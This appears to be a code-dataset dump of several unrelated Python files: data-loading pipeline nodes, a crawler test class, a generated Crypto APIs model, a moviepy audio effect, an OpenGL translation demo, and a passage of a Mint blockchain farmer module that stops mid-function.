autocommits this will have no effect. If this is a SQLAlchemy
connection and you are in a transaction, it will try to get a
reference to the current transaction and call commit on that.
rollback : bool, optional
If true try to rollback the transaction on exceptions. Behavior
may vary by backend DB library if you are not currently in a
transaction.
dry_run : bool, optional
If true, skip actually loading the data
"""
table = get_temp_table(conn, rows, create=True, schema=schema)
sql = self.get_bulk_statement(conn, "REPLACE", table.name, rows)
dbg("Loading %d rows\n%s" % (size(rows, "n/a"), sqlformat(sql)), indent="label")
if dry_run:
warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
else:
if not cursor:
cursor = self.get_sql_executor(conn)
try:
self.executemany(conn, cursor, sql, rows)
if commit:
self.commit(conn)
except:
if rollback:
self.rollback(conn)
raise
self.push(table.name)
class FileLoad(Node):
"""Load raw content to a file"""
def run(self, data, f, open_flags="w", push_file=False, dry_run=False):
"""Load raw data to a file or buffer
Parameters
----------
data
Data to write to file
f : file path or buffer
File path or buffer to write
open_flags : str, optional
Flags to pass to open() if f is not already an opened buffer
push_file : bool
If true, push the file forward instead of the data
dry_run : bool, optional
If true, skip actually loading the data
"""
is_text = True
if "b" in open_flags:
is_text = False
fo, _, close = open_filepath_or_buffer(
f, open_flags=open_flags, is_text=is_text
)
try:
if dry_run:
warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
else:
fo.write(data)
finally:
if close:
try:
fo.close()
except ValueError:
pass
if push_file:
self.push(f)
else:
self.push(data)
class URLLoad(Node):
"""Load data to URL with requests"""
def run(
self,
data,
url,
data_param="data",
session=None,
skip_raise=False,
dry_run=False,
**kwargs
):
"""Load data to URL using requests and push response.content. The url maybe be
a string (POST that url) or a dictionary of args to requests.request:
http://2.python-requests.org/en/master/api/?highlight=get#requests.request
Parameters
----------
data
Data to load to the URL
url : str or dict
If str, a URL to POST to. If a dict, args to requets.request
data_param : str, optional
parameter to stuff data in when calling requests methods
session : optional
A requests Session to use to make the request
skip_raise : bool, optional
if False, raise exceptions for bad response status
dry_run : bool, optional
If true, skip actually loading the data
**kwargs
Keyword arguments to pass to the request method. If a dict is
passed for the url parameter it overrides values here.
"""
requestor = requests
if session:
requestor = session
if dry_run:
warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
else:
if isinstance(url, str):
raiseif(
"data" in kwargs or "json" in kwargs,
"Overriding data/json params is not allowed",
)
kwargs[data_param] = data
resp = requestor.post(url, **kwargs)
elif isinstance(url, dict):
kwargs_copy = deepcopy(kwargs)
kwargs_copy.update(url)
raiseif(
"data" in kwargs_copy or "json" in kwargs_copy,
"Overriding data/json params is not allowed",
)
kwargs_copy[data_param] = data
resp = requestor.request(**kwargs_copy)
else:
raise AssertionError(
"Input url must be a str or dict type, got %s" % type(url)
)
if not skip_raise:
resp.raise_for_status()
self.push(data)
class EmailLoad(Node):
"""Load data to email via SMTP"""
def run(
self,
data,
frm=None,
to=None,
subject=None,
body=None,
html=None,
attach_as="attachment",
attachment_name=None,
formatter=None,
client=None,
host=None,
port=None,
username=None,
password=None,
dry_run=False,
):
"""Load data to email via SMTP.
Parameters
----------
data
EmailMessage or data to send. If the latter, the message will be
created from the other node arguments.
frm : str, optional
The from email address
to : str or list, optional
A str or list of destination email addresses
subject : str, optional
The email subject
body : str, optional
The email text body
html : str, optional
The email html body
attach_as : str
Where to put the data in the email message if building the message
from node arguments. Options: attachment, body, html.
attachment_name: str, optional
The file name to write the data to when attaching data to the
email. The file extension will be used to infer the mimetype of
the attachment. This should not be a full path as a temp directory
will be created for this.
formatter : callable
A function to format and return a string from the input data if
attach_as is set to "body" or "html".
client : optional
A connected smtplib.SMTP client
host : str, optional
The SMTP host to connect to if no client is provided
port : int, optional
The SMTP port to connect to if no client is provided
username : str, optional
The SMTP username for login if no client is provided
password : str, optional
The SMTP password for login if no client is provided
dry_run : bool, optional
If true, skip actually loading the data
"""
if isinstance(data, EmailMessage):
msg = data
else:
# Assume its data that needs to be converted to attachments and sent
raiseifnot(
frm and to and subject,
"Node context must have frm/to/subject set to create an email msg",
)
raiseifnot(
isinstance(data, str),
"data must be passed as raw str content, got %s" % type(data),
)
attachments = None
tmpdir = None
if attach_as == "attachment":
raiseifnot(
attachment_name,
"Must specify an attachment_name when attach_as = attachment",
)
tmpdir = tempfile.TemporaryDirectory()
filename = tmpdir.name + "/" + attachment_name
with open(filename, "w") as f:
f.write(data)
attachments = [filename]
else:
fmt_data = formatter(data) if formatter else data
if attach_as == "body":
body = (body or "") + fmt_data
elif attach_as == "html":
html = (html or "") + fmt_data
else:
raise AssertionError(
"Invalid attach_as value: %s, options: attachment, body, html"
% attach_as
)
msg = create_email(
frm, to, subject, body=body, html=html, attachments=attachments
)
if tmpdir:
tmpdir.cleanup()
if dry_run:
warn("dry_run=True, skipping load in %s.run" % self.__class__.__name__)
else:
dbg("Sending msg %s to %s" % (msg["Subject"], msg["To"]))
send_email(
msg,
client=client,
host=host,
port=port,
username=username,
password=password,
)
self.push(data)
node_names = find_class_in_dict(Node, locals(), include="Load")
node_names.extend(find_class_in_dict(Node, locals(), include="Print"))
if node_names:
__doc__ = __doc__ + get_class_list_docstring("Nodes", node_names)
| 30.5469 | 104 | 0.536224 |
a8eaa7dcef5a2c10d313aec9db484d33a2e124c7 | 385 | py | Python | crawlib2/tests/dummy_site_crawler/site/s2_music/entity_base.py | MacHu-GWU/crawlib2-project | 618d72522d5b36d40607b53b7de7623976460712 | [
"MIT"
] | null | null | null | crawlib2/tests/dummy_site_crawler/site/s2_music/entity_base.py | MacHu-GWU/crawlib2-project | 618d72522d5b36d40607b53b7de7623976460712 | [
"MIT"
] | null | null | null | crawlib2/tests/dummy_site_crawler/site/s2_music/entity_base.py | MacHu-GWU/crawlib2-project | 618d72522d5b36d40607b53b7de7623976460712 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import requests
from crawlib2.entity.mongodb.entity import MongodbEntitySingleStatus
class MusicWebsiteEntity(MongodbEntitySingleStatus):
meta = {
"abstract": True,
}
def build_request(self, url, **kwargs):
request = url
return request
def send_request(self, request, **kwargs):
return requests.get(request)
| 21.388889 | 68 | 0.67013 |
57e6b58d0ab6d8517b7fa682a35f030008d15625 | 13,365 | py | Python | cryptoapis/model/broadcast_locally_signed_transaction_rb_data_item.py | Crypto-APIs/Crypto_APIs_2.0_SDK_Python | c59ebd914850622b2c6500c4c30af31fb9cecf0e | [
"MIT"
] | 5 | 2021-05-17T04:45:03.000Z | 2022-03-23T12:51:46.000Z | cryptoapis/model/broadcast_locally_signed_transaction_rb_data_item.py | Crypto-APIs/Crypto_APIs_2.0_SDK_Python | c59ebd914850622b2c6500c4c30af31fb9cecf0e | [
"MIT"
] | null | null | null | cryptoapis/model/broadcast_locally_signed_transaction_rb_data_item.py | Crypto-APIs/Crypto_APIs_2.0_SDK_Python | c59ebd914850622b2c6500c4c30af31fb9cecf0e | [
"MIT"
] | 2 | 2021-06-02T07:32:26.000Z | 2022-02-12T02:36:23.000Z | """
CryptoAPIs
Crypto APIs 2.0 is a complex and innovative infrastructure layer that radically simplifies the development of any Blockchain and Crypto related applications. Organized around REST, Crypto APIs 2.0 can assist both novice Bitcoin/Ethereum enthusiasts and crypto experts with the development of their blockchain applications. Crypto APIs 2.0 provides unified endpoints and data, raw data, automatic tokens and coins forwardings, callback functionalities, and much more. # noqa: E501
The version of the OpenAPI document: 2.0.0
Contact: developers@cryptoapis.io
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from cryptoapis.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from cryptoapis.exceptions import ApiAttributeError
class BroadcastLocallySignedTransactionRBDataItem(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'signed_transaction_hex': (str,), # noqa: E501
'callback_secret_key': (str,), # noqa: E501
'callback_url': (str,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'signed_transaction_hex': 'signedTransactionHex', # noqa: E501
'callback_secret_key': 'callbackSecretKey', # noqa: E501
'callback_url': 'callbackUrl', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, signed_transaction_hex, *args, **kwargs): # noqa: E501
"""BroadcastLocallySignedTransactionRBDataItem - a model defined in OpenAPI
Args:
signed_transaction_hex (str): Represents the signed transaction's specific hex.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
callback_secret_key (str): Represents the Secret Key value provided by the customer. This field is used for security purposes during the callback notification, in order to prove the sender of the callback as Crypto APIs. For more information please see our [Documentation](https://developers.cryptoapis.io/technical-documentation/general-information/callbacks#callback-security).. [optional] # noqa: E501
callback_url (str): Represents the URL that is set by the customer where the callback will be received at. The callback notification will be received only if and when the event occurs.. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.signed_transaction_hex = signed_transaction_hex
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, signed_transaction_hex, *args, **kwargs): # noqa: E501
"""BroadcastLocallySignedTransactionRBDataItem - a model defined in OpenAPI
Args:
signed_transaction_hex (str): Represents the signed transaction's specific hex.
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
callback_secret_key (str): Represents the Secret Key value provided by the customer. This field is used for security purposes during the callback notification, in order to prove the sender of the callback as Crypto APIs. For more information please see our [Documentation](https://developers.cryptoapis.io/technical-documentation/general-information/callbacks#callback-security).. [optional] # noqa: E501
callback_url (str): Represents the URL that is set by the customer where the callback will be received at. The callback notification will be received only if and when the event occurs.. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.signed_transaction_hex = signed_transaction_hex
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 49.317343 | 484 | 0.606584 |
982892aeec70ac327f51ea785780d9e3b379ddf4 | 1,068 | py | Python | moviepy/audio/fx/multiply_stereo_volume.py | andriyor/moviepy | 8eaf3f02c5cf812e89f03e925cb2fa5e05b8d29a | [
"MIT"
] | 8,558 | 2015-01-03T05:14:12.000Z | 2022-03-31T21:45:38.000Z | moviepy/audio/fx/multiply_stereo_volume.py | andriyor/moviepy | 8eaf3f02c5cf812e89f03e925cb2fa5e05b8d29a | [
"MIT"
] | 1,592 | 2015-01-02T22:12:54.000Z | 2022-03-30T13:10:40.000Z | moviepy/audio/fx/multiply_stereo_volume.py | andriyor/moviepy | 8eaf3f02c5cf812e89f03e925cb2fa5e05b8d29a | [
"MIT"
] | 1,332 | 2015-01-02T18:01:53.000Z | 2022-03-31T22:47:28.000Z | from moviepy.decorators import audio_video_fx
@audio_video_fx
def multiply_stereo_volume(clip, left=1, right=1):
"""For a stereo audioclip, this function enables to change the volume
of the left and right channel separately (with the factors `left`
and `right`). Makes a stereo audio clip in which the volume of left
and right is controllable.
Examples
--------
>>> from moviepy import AudioFileClip
>>> music = AudioFileClip('music.ogg')
>>> audio_r = music.multiply_stereo_volume(left=0, right=1) # mute left channel/s
>>> audio_h = music.multiply_stereo_volume(left=0.5, right=0.5) # half audio
"""
def stereo_volume(get_frame, t):
frame = get_frame(t)
if len(frame) == 1: # mono
frame *= left if left is not None else right
else: # stereo, stereo surround...
for i in range(len(frame[0])): # odd channels are left
frame[:, i] *= left if i % 2 == 0 else right
return frame
return clip.transform(stereo_volume, keep_duration=True)
| 35.6 | 86 | 0.647004 |
bdf46a23ef6b4fc59e2a5c6a2c6ec7fa14f9965e | 141 | py | Python | Python/tuples.py | HarshitRuwali/HackerRank-Solutions | 29c3ebd87723e1237866a551783bf62cf470d919 | [
"MIT"
] | 8 | 2020-07-16T12:17:16.000Z | 2022-01-11T04:24:03.000Z | Python/tuples.py | HarshitRuwali/HackerRank-Solutions | 29c3ebd87723e1237866a551783bf62cf470d919 | [
"MIT"
] | null | null | null | Python/tuples.py | HarshitRuwali/HackerRank-Solutions | 29c3ebd87723e1237866a551783bf62cf470d919 | [
"MIT"
] | 5 | 2020-11-30T17:40:15.000Z | 2022-02-28T11:26:59.000Z | if __name__ == '__main__':
n = int(input())
integer_list = map(int, input().split())
t = tuple(integer_list)
print(hash(t))
| 20.142857 | 44 | 0.588652 |
ddc5d2ee2a30bcb6f13ae918986ab688e68b7b18 | 4,259 | py | Python | Computer Graphics/OpenGL 2D/Transformations/3.CircleTranslation.py | henriquesqs/Codes | 59e5bb683f3de2ee1b13621569954be1e4f37396 | [
"MIT"
] | null | null | null | Computer Graphics/OpenGL 2D/Transformations/3.CircleTranslation.py | henriquesqs/Codes | 59e5bb683f3de2ee1b13621569954be1e4f37396 | [
"MIT"
] | 1 | 2021-09-21T03:26:14.000Z | 2021-09-21T03:26:14.000Z | Computer Graphics/OpenGL 2D/Transformations/3.CircleTranslation.py | henriquesqs/Codes | 59e5bb683f3de2ee1b13621569954be1e4f37396 | [
"MIT"
] | 1 | 2020-03-31T01:49:23.000Z | 2020-03-31T01:49:23.000Z | import glfw
from OpenGL.GL import *
import OpenGL.GL.shaders
import numpy as np
import math
def translation():
return np.array([1.0, 0.0, 0.0, t_x,
0.0, 1.0, 0.0, t_y,
0.0, 0.0, 1.0, 0.0,
0.0, 0.0, 0.0, 1.0], np.float32)
def key_event(window, key, scancode, action, mods):
print('[key event] key=', key)
print('[key event] scancode=', scancode)
print('[key event] action=', action)
print('[key event] mods=', mods)
print('-------')
global t_x, t_y
if key == 87: # W
t_y += 0.01
if key == 83: # A
t_y -= 0.01
if key == 65: # S
t_x -= 0.01
if key == 68: # D
t_x += 0.01
def init_window():
glfw.init()
glfw.window_hint(glfw.VISIBLE, glfw.FALSE)
window = glfw.create_window(720, 600, "CircleTranslation", None, None)
glfw.make_context_current(window)
glfw.set_key_callback(window, key_event) # gets keyboard inputs
return window
def set_and_compile_shader(program, slot, slot_code):
# Set shaders source
glShaderSource(slot, slot_code)
# Compiler shaders source
glCompileShader(slot)
if not glGetShaderiv(slot, GL_COMPILE_STATUS):
error = glGetShaderInfoLog(slot).decode()
print(error)
raise RuntimeError("Shader compilation error")
# Attach shader objects to the program
glAttachShader(program, slot)
def draw_object():
num_vertices = 64 # define the "quality" of the circle
pi = 3.14
counter = 0
radius = 0.2
angle = 1.0
vertices = np.zeros(num_vertices, [("position", np.float32, 2)])
for counter in range(num_vertices):
angle += 2*pi/num_vertices
x = math.cos(angle)*radius
y = math.sin(angle)*radius
vertices[counter] = [x, y]
return vertices
def send_to_gpu(vertices):
# Request a buffer slot from GPU
buffer = glGenBuffers(1)
# Make this buffer the default one
glBindBuffer(GL_ARRAY_BUFFER, buffer)
# Upload data
glBufferData(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_DYNAMIC_DRAW)
glBindBuffer(GL_ARRAY_BUFFER, buffer)
return buffer
def show_window(window, program, loc, loc_color, vertices):
glfw.show_window(window)
while not glfw.window_should_close(window):
glfw.poll_events()
glClear(GL_COLOR_BUFFER_BIT)
glClearColor(1.0, 1.0, 1.0, 1.0)
# Draw Circle
mat_translation = np.zeros((4, 4), np.float32)
mat_translation = translation()
loc = glGetUniformLocation(program, "mat_transformation")
glUniformMatrix4fv(loc, 1, GL_TRUE, mat_translation)
glUniform4f(loc_color, 0.521, 0.521, 0.521, 1)
glDrawArrays(GL_TRIANGLE_FAN, 0, len(vertices))
glfw.swap_buffers(window)
glfw.terminate()
def init():
window = init_window()
vertex_code = """
attribute vec2 position;
uniform mat4 mat_transformation;
void main(){
gl_Position = mat_transformation * vec4(position,0.0,1.0);
}
"""
fragment_code = """
uniform vec4 color;
void main(){
gl_FragColor = color;
}
"""
# Request a program and shader slots from GPU
program = glCreateProgram()
vertex = glCreateShader(GL_VERTEX_SHADER)
fragment = glCreateShader(GL_FRAGMENT_SHADER)
set_and_compile_shader(program, vertex, vertex_code)
set_and_compile_shader(program, fragment, fragment_code)
# Build program
glLinkProgram(program)
if not glGetProgramiv(program, GL_LINK_STATUS):
print(glGetProgramInfoLog(program))
raise RuntimeError('Linking error')
# Make program the default program
glUseProgram(program)
vertices = draw_object()
buffer = send_to_gpu(vertices)
# Bind the position attribute
stride = vertices.strides[0]
offset = ctypes.c_void_p(0)
loc = glGetAttribLocation(program, "position")
glEnableVertexAttribArray(loc)
glVertexAttribPointer(loc, 2, GL_FLOAT, False, stride, offset)
loc_color = glGetUniformLocation(program, "color")
show_window(window, program, loc, loc_color, vertices)
# global var
t_x = 0
t_y = 0
init()
| 23.401099 | 77 | 0.638413 |
1b489f0516c6b11ca57ae9aa41fbede86fed092a | 35,415 | py | Python | mint/farmer/farmer.py | sai-genesis/rc1-test | 56e565952b283450c8589296f87c31b1c67b8502 | [
"Apache-2.0"
] | null | null | null | mint/farmer/farmer.py | sai-genesis/rc1-test | 56e565952b283450c8589296f87c31b1c67b8502 | [
"Apache-2.0"
] | null | null | null | mint/farmer/farmer.py | sai-genesis/rc1-test | 56e565952b283450c8589296f87c31b1c67b8502 | [
"Apache-2.0"
] | null | null | null | import asyncio
import json
import logging
import time
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple
import traceback
import aiohttp
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
import mint.server.ws_connection as ws # lgtm [py/import-and-import-from]
from mint.consensus.coinbase import create_puzzlehash_for_pk
from mint.consensus.constants import ConsensusConstants
from mint.daemon.keychain_proxy import (
KeychainProxy,
KeychainProxyConnectionFailure,
connect_to_keychain_and_validate,
wrap_local_keychain,
)
from mint.pools.pool_config import PoolWalletConfig, load_pool_config
from mint.protocols import farmer_protocol, harvester_protocol
from mint.protocols.pool_protocol import (
ErrorResponse,
get_current_authentication_token,
GetFarmerResponse,
PoolErrorCode,
PostFarmerPayload,
PostFarmerRequest,
PutFarmerPayload,
PutFarmerRequest,
AuthenticationPayload,
)
from mint.protocols.protocol_message_types import ProtocolMessageTypes
from mint.server.outbound_message import NodeType, make_msg
from mint.server.server import ssl_context_for_root
from mint.server.ws_connection import WSMintConnection
from mint.ssl.create_ssl import get_mozilla_ca_crt
from mint.types.blockchain_format.proof_of_space import ProofOfSpace
from mint.types.blockchain_format.sized_bytes import bytes32
from mint.util.bech32m import decode_puzzle_hash
from mint.util.byte_types import hexstr_to_bytes
from mint.util.config import load_config, save_config, config_path_for_filename
from mint.util.hash import std_hash
from mint.util.ints import uint8, uint16, uint32, uint64
from mint.util.keychain import Keychain
from mint.wallet.derive_keys import (
master_sk_to_farmer_sk,
master_sk_to_pool_sk,
master_sk_to_wallet_sk,
find_authentication_sk,
find_owner_sk,
)
from mint.wallet.puzzles.singleton_top_layer import SINGLETON_MOD
singleton_mod_hash = SINGLETON_MOD.get_tree_hash()
log = logging.getLogger(__name__)
UPDATE_POOL_INFO_INTERVAL: int = 3600
UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300
UPDATE_HARVESTER_CACHE_INTERVAL: int = 90
"""
HARVESTER PROTOCOL (FARMER <-> HARVESTER)
"""
class HarvesterCacheEntry:
def __init__(self):
self.data: Optional[dict] = None
self.last_update: float = 0
def bump_last_update(self):
self.last_update = time.time()
def set_data(self, data):
self.data = data
self.bump_last_update()
def needs_update(self):
return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL
def expired(self):
return time.time() - self.last_update > UPDATE_HARVESTER_CACHE_INTERVAL * 10
class Farmer:
def __init__(
self,
root_path: Path,
farmer_config: Dict,
pool_config: Dict,
consensus_constants: ConsensusConstants,
local_keychain: Optional[Keychain] = None,
):
self.keychain_proxy: Optional[KeychainProxy] = None
self.local_keychain = local_keychain
self._root_path = root_path
self.config = farmer_config
self.pool_config = pool_config
# Keep track of all sps, keyed on challenge chain signage point hash
self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {}
# Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge
self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {}
# Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures
self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {}
# number of responses to each signage point
self.number_of_responses: Dict[bytes32, int] = {}
# A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used
# to periodically clear the memory
self.cache_add_time: Dict[bytes32, uint64] = {}
self.cache_clear_task: asyncio.Task
self.update_pool_state_task: asyncio.Task
self.constants = consensus_constants
self._shut_down = False
self.server: Any = None
self.state_changed_callback: Optional[Callable] = None
self.log = log
async def ensure_keychain_proxy(self) -> KeychainProxy:
if not self.keychain_proxy:
if self.local_keychain:
self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log)
else:
self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log)
if not self.keychain_proxy:
raise KeychainProxyConnectionFailure("Failed to connect to keychain service")
return self.keychain_proxy
async def get_all_private_keys(self):
keychain_proxy = await self.ensure_keychain_proxy()
return await keychain_proxy.get_all_private_keys()
async def setup_keys(self):
self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [
master_sk_to_pool_sk(sk) for sk in self.all_root_sks
]
if len(self.get_public_keys()) == 0:
error_str = "No keys exist. Please run 'mint keys generate' or open the UI."
raise RuntimeError(error_str)
# This is the farmer configuration
self.farmer_target_encoded = self.config["xkm_target_address"]
self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded)
self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]]
# This is the self pooling configuration, which is only used for original self-pooled plots
self.pool_target_encoded = self.pool_config["xkm_target_address"]
self.pool_target = decode_puzzle_hash(self.pool_target_encoded)
self.pool_sks_map: Dict = {}
for key in self.get_private_keys():
self.pool_sks_map[bytes(key.get_g1())] = key
assert len(self.farmer_target) == 32
assert len(self.pool_target) == 32
if len(self.pool_sks_map) == 0:
error_str = "No keys exist. Please run 'mint keys generate' or open the UI."
raise RuntimeError(error_str)
# The variables below are for use with an actual pool
# From p2_singleton_puzzle_hash to pool state dict
self.pool_state: Dict[bytes32, Dict] = {}
# From public key bytes to PrivateKey
self.authentication_keys: Dict[bytes, PrivateKey] = {}
# Last time we updated pool_state based on the config file
self.last_config_access_time: uint64 = uint64(0)
self.harvester_cache: Dict[str, Dict[str, HarvesterCacheEntry]] = {}
async def _start(self):
await self.setup_keys()
self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task())
self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task())
def _close(self):
self._shut_down = True
async def _await_closed(self):
await self.cache_clear_task
await self.update_pool_state_task
def _set_state_changed_callback(self, callback: Callable):
self.state_changed_callback = callback
async def on_connect(self, peer: WSMintConnection):
# Sends a handshake to the harvester
self.state_changed("add_connection", {})
handshake = harvester_protocol.HarvesterHandshake(
self.get_public_keys(),
self.pool_public_keys,
)
if peer.connection_type is NodeType.HARVESTER:
msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake)
await peer.send_message(msg)
def set_server(self, server):
self.server = server
def state_changed(self, change: str, data: Dict[str, Any]):
if self.state_changed_callback is not None:
self.state_changed_callback(change, data)
def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str):
self.log.error(error_message)
self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append(
ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict()
)
def on_disconnect(self, connection: ws.WSMintConnection):
self.log.info(f"peer disconnected {connection.get_peer_logging()}")
self.state_changed("close_connection", {})
async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]:
try:
async with aiohttp.ClientSession(trust_env=True) as session:
async with session.get(
f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log)
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"GET /pool_info response: {response}")
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}"
)
return None
async def _pool_get_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey
) -> Optional[Dict]:
assert authentication_sk.get_g1() == pool_config.authentication_public_key
authentication_token = get_current_authentication_token(authentication_token_timeout)
message: bytes32 = std_hash(
AuthenticationPayload(
"get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
)
)
signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
get_farmer_params = {
"launcher_id": pool_config.launcher_id.hex(),
"authentication_token": authentication_token,
"signature": bytes(signature).hex(),
}
try:
async with aiohttp.ClientSession(trust_env=True) as session:
async with session.get(
f"{pool_config.pool_url}/farmer",
params=get_farmer_params,
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"GET /farmer response: {response}")
if "error_code" in response:
